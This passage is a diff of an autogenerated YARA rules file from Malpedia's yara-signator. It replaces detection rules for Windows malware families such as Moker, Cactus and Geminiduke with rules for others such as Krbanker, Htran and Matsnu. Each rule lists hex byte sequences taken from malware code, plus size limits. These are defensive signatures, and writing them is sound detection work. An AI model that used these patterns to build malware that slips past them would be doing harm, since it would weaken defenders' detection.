-		$sequence_4 = { 69c9e8030000 51 ff15???????? 80bec412000000 0f8504fbffff 33c0 8b8c24d8120000 }
-		$sequence_5 = { 7cb7 3d00010000 740a c786a4af060028a74200 8a55fc 8894303c1b0000 8d8eb41e0000 }
-		$sequence_6 = { 0f8494000000 8d85bcf7ffff 8d5002 8d642400 668b08 83c002 6685c9 }
-		$sequence_7 = { 889d65cbffff 89954ccbffff 898550cbffff 899d28cbffff 899d38cbffff 899d48cbffff }
-		$sequence_8 = { 75df 8d85d0fdffff 50 ffd3 8b4dfc 5f 5e }
-		$sequence_9 = { 899d70cbffff 899568cbffff 899d60cbffff 3bf3 7533 8b8518cbffff 8b4804 }
+		$sequence_0 = { 66895004 8a0d???????? 884806 8b45b4 8bf0 8da42400000000 8a08 }
+		$sequence_1 = { f3a5 8bc8 83e103 f3a4 8d45dc }
+		$sequence_2 = { 3acb 75f9 2bc6 8dbd4cf7ffff 4f 8a4f01 47 }
+		$sequence_3 = { 8bc8 c1e902 f3a5 8bc8 83e103 837d0c00 }
+		$sequence_4 = { 6a00 52 898df4faffff e8???????? b908000000 }
+		$sequence_5 = { 2bfe 8d9b00000000 8b1437 8b4c3708 }
+		$sequence_6 = { 33cd e8???????? 8be5 5d c20800 81ff00001000 0f8387000000 }
+		$sequence_7 = { 85c0 753e 6a02 56 }
+		$sequence_8 = { 83e03f 0fb680c0940120 83e23f 41 884602 8a92c0940120 885603 }
+		$sequence_9 = { 8985edfeffff 668985f1feffff 8885f3feffff 8845ec 8945ed 8945f1 }
 
 	condition:
-		7 of them and filesize < 430080
+		7 of them and filesize < 250880
 }
-rule MALPEDIA_Win_Moker_Auto : FILE
+rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cb9352b8-7986-51d0-bfba-8cdb83b8b9cc"
+		id = "b4746bef-c0ea-5bd8-a0d8-b1e69c784457"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moker_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cur1_downloader_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "7734cc9477f43c35a46e19994290fc756278e602b0dee6674db4466771e526fb"
+		logic_hash = "75283ba2057f95c8da3348505d3be061064c40e196de82d8a3f46a329333d71b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135750,38 +135469,32 @@ rule MALPEDIA_Win_Moker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0302 8945d4 8b4dd4 83c102 }
-		$sequence_1 = { 0301 8945e0 e8???????? 8b55e8 }
-		$sequence_2 = { 0100 83c414 85c0 7502 eb0a }
-		$sequence_3 = { 0302 8945e8 eb09 8b45e8 }
-		$sequence_4 = { 0302 8945dc 8b45dc 83c002 }
-		$sequence_5 = { 0302 8945e8 8b4df8 8b55fc }
-		$sequence_6 = { 6a00 8b15???????? 52 6a1e 6a3c }
-		$sequence_7 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 }
-		$sequence_8 = { 034508 8078fe5c 740d c6005c c6400100 }
-		$sequence_9 = { 50 6800800000 6a00 ff7508 ff15???????? e8???????? 9d }
-		$sequence_10 = { 39f7 7410 fc 39fe }
-		$sequence_11 = { 730c 8b420c 29c6 8b4214 01c6 eb06 83c228 }
-		$sequence_12 = { eb82 8b86b8000000 40 8d5002 83aec400000004 }
-		$sequence_13 = { 75eb 59 5e 5f c9 c21000 }
-		$sequence_14 = { 51 8b4510 48 ff4514 }
-		$sequence_15 = { 8d5001 52 8d5580 52 e42b }
+		$sequence_0 = { 8d41ff 8b8482c81a0200 85c0 0f84c6000000 413bc7 }
+		$sequence_1 = { 8b4c2450 e8???????? 4889442458 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 }
+		$sequence_2 = { 83e10f 480fbe841100e40100 8a8c1110e40100 4c2bc0 418b40fc d3e8 }
+		$sequence_3 = { 4863442420 4533c0 0fb6540424 488d0d8da60200 e8???????? 48634c2420 88440c24 }
+		$sequence_4 = { 488bbc24e0000000 4803fa 488bd7 8b7c2440 486bff0c 488d35aa980200 4803f7 }
+		$sequence_5 = { 4533c9 4533c0 488d542438 488b8c24d8000000 }
+		$sequence_6 = { b843000000 6689842486000000 b875000000 6689842488000000 b872000000 668984248a000000 b872000000 }
+		$sequence_7 = { 4885c0 751e 498bc6 4c8d3d9f39ffff }
+		$sequence_8 = { c744242001000000 4533c9 4533c0 488d942420170000 33c9 ff15???????? 89442468 }
+		$sequence_9 = { 4889442478 488b4c2430 488b542420 4803d1 488bca e8???????? 488b4c2478 }
 
 	condition:
-		7 of them and filesize < 1761280
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Win_Vanhelsing_Auto : FILE
+rule MALPEDIA_Win_Slickshoes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02fe503d-2dc7-525c-81f0-efaa387cf55b"
+		id = "ad79f63d-1e65-5f60-a723-157797029623"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vanhelsing"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vanhelsing_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slickshoes_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "88005107b8dd0aed04a916a851d1dfdd2e8ac36a0ef3ce82f006aaa16cb30fa5"
+		logic_hash = "d52c38b22f881790a505e094420c171449849a1fa94bb94b87565ae649a918cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135795,32 +135508,32 @@ rule MALPEDIA_Win_Vanhelsing_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c3 55 8bec 81ec9c000000 8b450c 53 }
-		$sequence_1 = { 8b4518 0f1000 0f1145cc 0f104010 8b01 8b4904 8945ec }
-		$sequence_2 = { 660f380035???????? 0f57c8 660f38000d???????? 0f29b520ffffff 0f294df0 0f28c6 660fd4c3 }
-		$sequence_3 = { 8b45e4 8b048598485600 8b4de0 f644082801 7515 e8???????? c70009000000 }
-		$sequence_4 = { 85c9 7410 8a80b4d44800 8806 46 41 897590 }
-		$sequence_5 = { 6a00 6a00 6800000008 ff15???????? 6a03 6a00 6a00 }
-		$sequence_6 = { 888570fbffff 240f 884580 8a06 888571fbffff 240f 884581 }
-		$sequence_7 = { 039d48ffffff 8b4dc8 138de8feffff 039df0feffff 898530ffffff 8bc3 138ddcfeffff }
-		$sequence_8 = { 7f4f 8d4608 50 8d85d8fbffff 68???????? 50 e8???????? }
-		$sequence_9 = { 0fb6cb c1e803 83e107 0fb67405dc 8d8514ffffff d3ee 83e601 }
+		$sequence_0 = { ff3424 5b 81c404000000 31ca 59 e9???????? 5e }
+		$sequence_1 = { ff742404 5b 8f0424 e9???????? 871424 8b2424 e9???????? }
+		$sequence_2 = { e9???????? 890424 e9???????? 8b1c24 81c404000000 01d6 e9???????? }
+		$sequence_3 = { e9???????? 5c 81c5aae2bb7f 8b1424 56 e9???????? 58 }
+		$sequence_4 = { fc 5d e5b4 d070d3 ac 4d f3b694 }
+		$sequence_5 = { 8a12 be00020000 81c61f000000 0017 81ee40000000 89ef b90a000000 }
+		$sequence_6 = { ff3424 ff3424 e9???????? 55 bda9d61ffa 29e8 5d }
+		$sequence_7 = { ff3424 5b 51 890424 89e0 83ec04 893c24 }
+		$sequence_8 = { e9???????? 52 ba3c0d7e47 e9???????? 59 83ec04 891424 }
+		$sequence_9 = { e9???????? 5d 83c104 870c24 8b2424 e9???????? 81ec04000000 }
 
 	condition:
-		7 of them and filesize < 2981888
+		7 of them and filesize < 11198464
 }
-rule MALPEDIA_Win_Cactus_Auto : FILE
+rule MALPEDIA_Win_Holerun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb289dca-899a-5588-9223-1deb6b75b964"
+		id = "79210bcf-218e-5107-a109-edeb02cfeccf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cactus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cactus_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.holerun_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "c959580feec97f87bfc35165a408b3d9e2aec2dc4a519f266c222421b5acd4bf"
+		logic_hash = "089e5eef0cb363abe6346868d7bc24f6b1004eaa9f42643e6a6b76322b0e9b60"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135834,32 +135547,32 @@ rule MALPEDIA_Win_Cactus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f843e010000 488d1592b52000 4889d9 e8???????? 85c0 }
-		$sequence_1 = { e8???????? e8???????? 4c8d05d3572000 baf10c0000 488d0d7f562000 e8???????? 4531c0 }
-		$sequence_2 = { ffd7 8b18 4180fd01 76e1 4584f6 759b e8???????? }
-		$sequence_3 = { e8???????? 4531c0 ba00010c00 b90d000000 e8???????? 4889e9 e8???????? }
-		$sequence_4 = { e8???????? 4889c1 e8???????? 488b4b30 4889c2 488b4328 488b4078 }
-		$sequence_5 = { eb99 c744243806000000 6690 f6431830 0f85cffdffff 488d35df063a00 e9???????? }
-		$sequence_6 = { e9???????? e8???????? 4c8d056ab43a00 bad6000000 4889e9 e8???????? 4531c0 }
-		$sequence_7 = { e8???????? 488b4b10 e8???????? 85c0 0f85b4000000 488b8b90000000 bf01000000 }
-		$sequence_8 = { e8???????? 4989d8 4889fa 4889f1 e8???????? 488d542423 4989d8 }
-		$sequence_9 = { bacb010000 488d0d282d3b00 e8???????? 4531c0 ba00010c00 b939000000 e8???????? }
+		$sequence_0 = { 488d45c0 4989c9 4989d0 ba00040000 4889c1 e8???????? 488b85f0030000 }
+		$sequence_1 = { 488b85e0020000 488b4008 ba20000000 4889c1 e8???????? 488985c0020000 4883bdc002000000 }
+		$sequence_2 = { 750a b8ffffffff e9???????? 488b4510 488b00 8b00 3d910000c0 }
+		$sequence_3 = { 48837df000 751b 488b4510 488b00 488d1502380000 }
+		$sequence_4 = { ba20000000 4889c1 e8???????? 488945f0 48837df000 0f84dd000000 488345f001 }
+		$sequence_5 = { eb31 488b05???????? ffd0 89c1 488b85e0020000 }
+		$sequence_6 = { 488345f808 488d050f8a0000 483945f8 75d1 b801000000 4883c430 5d }
+		$sequence_7 = { 48c1e002 4889c2 488d0549650000 890c02 }
+		$sequence_8 = { 488985a0000000 c785cc02000000000000 e9???????? 8b85cc020000 4898 488b84c590000000 }
+		$sequence_9 = { 750c b91f000000 e8???????? eb39 488b05???????? 8b00 85c0 }
 
 	condition:
-		7 of them and filesize < 13587456
+		7 of them and filesize < 156672
 }
-rule MALPEDIA_Win_Geminiduke_Auto : FILE
+rule MALPEDIA_Win_Telb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba57e2c8-93bd-55ac-a9e9-1b7d9180b057"
+		id = "888a5e5b-e658-58db-97cc-bf969236e2af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.geminiduke_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.telb_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "19a3524ebf5f0547a75168cd2fc0d4ded0d15d189661f967133afc45a2ebe1fb"
+		logic_hash = "e3ec407f2b3918e01e6c60147a108fc9762a60e1c29d49f9899f4240d976bb07"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135873,36 +135586,32 @@ rule MALPEDIA_Win_Geminiduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 50 6801000080 ff15???????? 85c0 7407 }
-		$sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa 5f 59 }
-		$sequence_2 = { 52 6819000200 6a00 68???????? e8???????? 83c404 50 }
-		$sequence_3 = { 50 51 57 8b7c2410 }
-		$sequence_4 = { 034590 03c8 894dd0 8b45f8 }
-		$sequence_5 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca 8b9564ffffff }
-		$sequence_6 = { 034590 8b8d70ffffff c1e907 8b9570ffffff }
-		$sequence_7 = { 03459c 03c8 894ddc 8b45fc }
-		$sequence_8 = { 33d2 f7f3 668907 8bc2 }
-		$sequence_9 = { 83c1d8 e9???????? 53 56 57 32db }
-		$sequence_10 = { 80f909 7704 8ac1 0430 }
-		$sequence_11 = { 8a6834 0fb65036 8a4835 c1e108 0bca 0fb65037 }
-		$sequence_12 = { 8ad1 80ea0a 80fa05 7705 }
-		$sequence_13 = { 66894704 8bc2 c1e010 668b4602 33d2 f7f3 }
+		$sequence_0 = { e8???????? a1???????? 33c4 89842404100000 56 57 6a00 }
+		$sequence_1 = { 51 e8???????? 83c408 8d85e8dfffff c78598dfffff00000000 8985a0dfffff }
+		$sequence_2 = { eb07 6a16 68???????? e8???????? 8d4c2430 e8???????? }
+		$sequence_3 = { 81cf00000003 89bd48eeffff 0f1000 0f1185b0eeffff f30f7e4010 }
+		$sequence_4 = { ffd1 8bf0 8b442414 50 8b08 ff5108 }
+		$sequence_5 = { 8d8d88efffff e8???????? 33c9 81cf80000000 89bd38eeffff }
+		$sequence_6 = { c7400400000000 8985e8edffff 8908 c645fc09 8b85a8eeffff 89853ceeffff 8b85dceeffff }
+		$sequence_7 = { c644241b01 8b14b8 8bca 8d7102 668b01 }
+		$sequence_8 = { eb06 8bbd48eeffff 80bd4feeffff00 0f84a1010000 51 8d8d88efffff e8???????? }
+		$sequence_9 = { c7401407000000 668908 8d8db8efffff c645fc28 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Nimgrabber_Auto : FILE
+rule MALPEDIA_Win_Krbanker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89bd52a7-663e-548b-aa96-3fbc1c4d91ac"
+		id = "d85e7258-981d-5cc6-a33a-cbcdd663368d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimgrabber_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.krbanker_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "d088108be342ea9771cd179dc72ead263968b1a4b5039d9c99155df864322e6b"
+		logic_hash = "e566b2d91c9e72b8d03a6b5c791e4e71a6dc723cd18d0207fd049c63356700fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135916,32 +135625,32 @@ rule MALPEDIA_Win_Nimgrabber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89e8 e8???????? 8b4310 8d68f8 85c0 0f8469feffff 8b4500 }
-		$sequence_1 = { 8b4514 89442414 83fa0f 7f5a 8b5d04 8b4500 85db }
-		$sequence_2 = { 89f8 25ff010000 0fb78446e4030000 6685c0 0f85a0090000 89f8 89fa }
-		$sequence_3 = { 8b442420 8b00 39c6 0f8256feffff 83e801 893424 89442404 }
-		$sequence_4 = { 8b44243c 8b4c2460 8d5c0808 0fb64708 3c2a 0f849b0b0000 0f87f7000000 }
-		$sequence_5 = { 8d56f8 83e808 8946f8 83f807 0f861a020000 8b4304 85c0 }
-		$sequence_6 = { 83ff01 0f8492000000 8b11 8d6ffe 39d5 7211 83ea01 }
-		$sequence_7 = { 037304 8b5208 0fb6f8 89f1 897c2440 83c42c 5b }
-		$sequence_8 = { e8???????? c1e807 83f001 83e001 e9???????? 837c24687f 0f8ea80b0000 }
-		$sequence_9 = { 037c2440 0f49c7 83c208 89542414 89c5 89c8 25ffffff3f }
+		$sequence_0 = { 895500 8b4104 894504 8b5108 895508 8b410c }
+		$sequence_1 = { 6a00 6a00 6801030080 6a00 6802000000 6805000080 }
+		$sequence_2 = { 23d0 8954244c eb08 c744244cffffffff 8d4c2424 }
+		$sequence_3 = { bb40010000 e8???????? 83c410 8945d0 ff75d0 ff75d4 }
+		$sequence_4 = { 8955e0 8d55d4 52 6a01 50 51 }
+		$sequence_5 = { e8???????? 47 4b 3bdd 0f8d5bffffff eb02 8bde }
+		$sequence_6 = { 75a4 dd442410 e8???????? 8ad8 }
+		$sequence_7 = { c3 8b4c2420 8b542404 8d442408 50 51 }
+		$sequence_8 = { 50 8b5dec 8b1b 85db 7409 }
+		$sequence_9 = { 0faffa 46 3bf0 76cf }
 
 	condition:
-		7 of them and filesize < 1238016
+		7 of them and filesize < 1826816
 }
-rule MALPEDIA_Win_Teleport_Auto : FILE
+rule MALPEDIA_Win_Matsnu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8775bf50-843a-53a5-99d2-7f1e8df96bef"
+		id = "ac7d48b9-a967-5b74-8534-0fe3b275eb93"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.teleport_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matsnu_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "faedc771daee9d9167e2f4449bf3e87076b81c367250e9b9589a86138f934d43"
+		logic_hash = "5be086cc43b82632d1f6dd9c773840652ffd11fa9db4f5cb2927e6c0f81579b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135955,32 +135664,32 @@ rule MALPEDIA_Win_Teleport_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 894768 893d???????? ff15???????? }
-		$sequence_1 = { 894824 c6401c01 894dfc 8d85d0feffff b912000000 eb50 }
-		$sequence_2 = { 8b04bde83e4300 ff743018 ff15???????? 85c0 0f95c0 5f 5e }
-		$sequence_3 = { 8b01 6a01 ff10 8b4608 8d7e08 8b08 8900 }
-		$sequence_4 = { 83c404 8b4dc0 0f1003 0f110401 83c010 8945c8 eb06 }
-		$sequence_5 = { 8b45ec c1e810 0fb6c0 330c85a0fe4200 0fb6c2 330c85a0f64200 334fe8 }
-		$sequence_6 = { 3bf0 745a 0f1f440000 68???????? 8bcf e8???????? 837e1c08 }
-		$sequence_7 = { 8b4104 8987a4000000 8b5108 8945f8 8bc2 8997a8000000 8b590c }
-		$sequence_8 = { 894820 894824 c6401c01 8d45c0 c745fc08000000 be00100000 }
-		$sequence_9 = { 0fb6c3 8b5de8 331485a0f64200 3357ac 8bc2 c1e808 0fb6c8 }
+		$sequence_0 = { e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff 8985c4fbffff 8b85c0fbffff }
+		$sequence_1 = { c645f700 c645f800 c645f90d c645fa0a c645fb00 }
+		$sequence_2 = { 750f c785a4fbffff02000000 e9???????? 8985bcfbffff 83bdb0fbffff01 }
+		$sequence_3 = { 8b75fa 01c6 8b4604 48 0145de ff45c6 }
+		$sequence_4 = { 0f8229010000 c745ea00000000 8b45e6 c1e004 8b75fa }
+		$sequence_5 = { 751d ff75ba ff7510 e8???????? 8945f6 }
+		$sequence_6 = { 884db8 807db800 7503 ff45be }
+		$sequence_7 = { c745f600000000 c745fa00000000 e8???????? 5b }
+		$sequence_8 = { 837d1800 7405 8b7d18 8907 b820000000 }
+		$sequence_9 = { 31c0 8985bcfbffff ffb5c4fbffff e8???????? 83f800 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 606992
 }
-rule MALPEDIA_Win_Clambling_Auto : FILE
+rule MALPEDIA_Win_Htran_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76c3ecc2-3249-54dd-85de-02fe8ad874ce"
+		id = "5705bf81-9a36-5bdc-a413-5dc9bbe8f8e2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clambling_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htran_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "95ebecd5667958656960c5343bf195152cd54c7954e81daf96b602e90195edba"
+		logic_hash = "f4c537d909874a527abd7f69551092957789e48daeb6a5277998dd498c7b0511"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135994,32 +135703,32 @@ rule MALPEDIA_Win_Clambling_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc6 746f 488d8424a8010000 448d4612 488d8c24a0010000 }
-		$sequence_1 = { 44896c2428 895c2420 e8???????? e9???????? ff15???????? 3bc6 }
-		$sequence_2 = { 440fb75c2440 66453bdd 7f0b 0fb7442442 66413bc7 }
-		$sequence_3 = { 7507 66893d???????? 488b0d???????? 488d542430 ff15???????? 448b442430 33d2 }
-		$sequence_4 = { 7412 48ffc3 4883c010 4881fb00040000 }
-		$sequence_5 = { ffd0 483bdf 7409 488bcb ff15???????? 33c0 488b5c2438 }
-		$sequence_6 = { 4c8d442470 8d5601 4889442420 ff15???????? }
-		$sequence_7 = { 488b542470 488b8c24a8010000 ff15???????? 8907 eb08 ff15???????? }
-		$sequence_8 = { 8bc3 eb02 33c0 4883c470 415d 5f }
-		$sequence_9 = { 893d???????? ff15???????? 3bc7 7507 66893d???????? }
+		$sequence_0 = { 8b942430510000 55 52 68???????? e8???????? }
+		$sequence_1 = { e8???????? 83c404 e9???????? 68???????? e8???????? 8b942430510000 }
+		$sequence_2 = { 8d3449 8d34b5f09b4000 83c00c 3bc6 7305 }
+		$sequence_3 = { 68???????? 6a02 e8???????? 8bb42400020000 83c408 83fe02 0f8ef0000000 }
+		$sequence_4 = { 5e 83c414 c3 6a05 }
+		$sequence_5 = { 8b8424e0420100 33c9 894c2414 53 8b10 }
+		$sequence_6 = { ff15???????? 85c0 7d14 68???????? e8???????? 83c404 }
+		$sequence_7 = { c3 6a00 6a01 6a02 ff15???????? 85c0 }
+		$sequence_8 = { 8816 46 8a10 40 0fb6da f683c1c3400004 740c }
+		$sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 }
 
 	condition:
-		7 of them and filesize < 412672
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Jolob_Auto : FILE
+rule MALPEDIA_Win_Cloudburst_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e26fb753-78dd-5e02-86f5-44abfa0b6e1a"
+		id = "66798bc9-d5a7-5171-afa8-26e587fd1d6d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jolob_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudburst_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "95fc52fc444139dde815965f9b3fdbca25ad1f5fb52fadd80f33a59c158da935"
+		logic_hash = "4402c4459a61713f167f313847e8e10fbc4c4d6c965b37f16be2690ee599b8f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136033,32 +135742,32 @@ rule MALPEDIA_Win_Jolob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a64 ff15???????? e9???????? 8b431c e8???????? ff7318 e8???????? }
-		$sequence_1 = { ff15???????? 50 ff15???????? 8d85ecfeffff 50 ff15???????? 85c0 }
-		$sequence_2 = { 3bc2 75ec 834710f8 8d75dc e8???????? ff75f4 ff15???????? }
-		$sequence_3 = { 832600 59 8bb720080000 8b2d???????? 85f6 7415 }
-		$sequence_4 = { 8945e4 e8???????? 8b5de4 8b4f0c 53 }
-		$sequence_5 = { 8a45ff 88043e 46 83fe04 7c1f 807c3efc0d 7518 }
-		$sequence_6 = { 8bc6 5e c20400 832700 85f6 7410 8b4618 }
-		$sequence_7 = { 8d7df4 e8???????? 8b45f4 8906 5f c9 c3 }
-		$sequence_8 = { 3b4e30 72e9 8918 8b463c }
-		$sequence_9 = { 3bc3 7407 50 e8???????? 59 895e14 895e10 }
+		$sequence_0 = { 33d3 41891424 4133d3 4189542404 }
+		$sequence_1 = { 49ffc0 eb39 0fb6c1 43c6041825 }
+		$sequence_2 = { 4585c0 743e 488b0d???????? 4c8d4c2448 488bd7 }
+		$sequence_3 = { 45330c24 45894c2410 4133d1 4189542414 448bc2 4533442408 }
+		$sequence_4 = { 0f8cb0000000 48897c2450 4c89642458 488bfe }
+		$sequence_5 = { 4d8bf8 440fb6420c 41c1e108 4c8d35a3e5ffff 41c1e008 c1e708 }
+		$sequence_6 = { 418bea 4589542440 33eb 8bc5 }
+		$sequence_7 = { c744245068000000 48894598 c744247004010000 c745a004010000 }
+		$sequence_8 = { 418bc6 99 83e20f 03c2 8bc8 83e00f 3bc2 }
+		$sequence_9 = { 418b4424fc 418942fc 4183bf0002000001 0f8e3d010000 90 458b4c24e0 41ffc6 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 2363392
 }
-rule MALPEDIA_Win_Ratel_Auto : FILE
+rule MALPEDIA_Win_Pocodown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3659af5a-6903-5ae8-965b-97a9526108b3"
+		id = "24fa8c2b-d3e1-5926-9dee-69a93fed8b3c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratel_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pocodown_auto.yar#L1-L90"
 		license_url = "N/A"
-		logic_hash = "89a6fc619b74a1abf97d7e9ad932eeb9075f956a974cadff963b35627fbf078a"
+		logic_hash = "81ce65c7d22552fcdf6138ce3c49e38f993fc4ab399006dba75fe36bc9807464"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136072,32 +135781,30 @@ rule MALPEDIA_Win_Ratel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????080e4c00 e8???????? 83ec08 b9???????? c705????????01000000 c705????????94154c00 c705????????00000000 }
-		$sequence_1 = { 8b510c 31c0 395108 0f82dafeffff 8b01 ff5024 89c2 }
-		$sequence_2 = { 8b5c2420 395808 0f8c51020000 8b442454 8b4c2420 8b4004 39c8 }
-		$sequence_3 = { 8b4508 8b550c 890c24 8d4de0 8945d0 8955d4 e8???????? }
-		$sequence_4 = { 8d5601 89d8 89530c e8???????? 89c1 890c24 e9???????? }
-		$sequence_5 = { 8d7810 83c004 c744243200000000 890424 89542426 31d2 6689542436 }
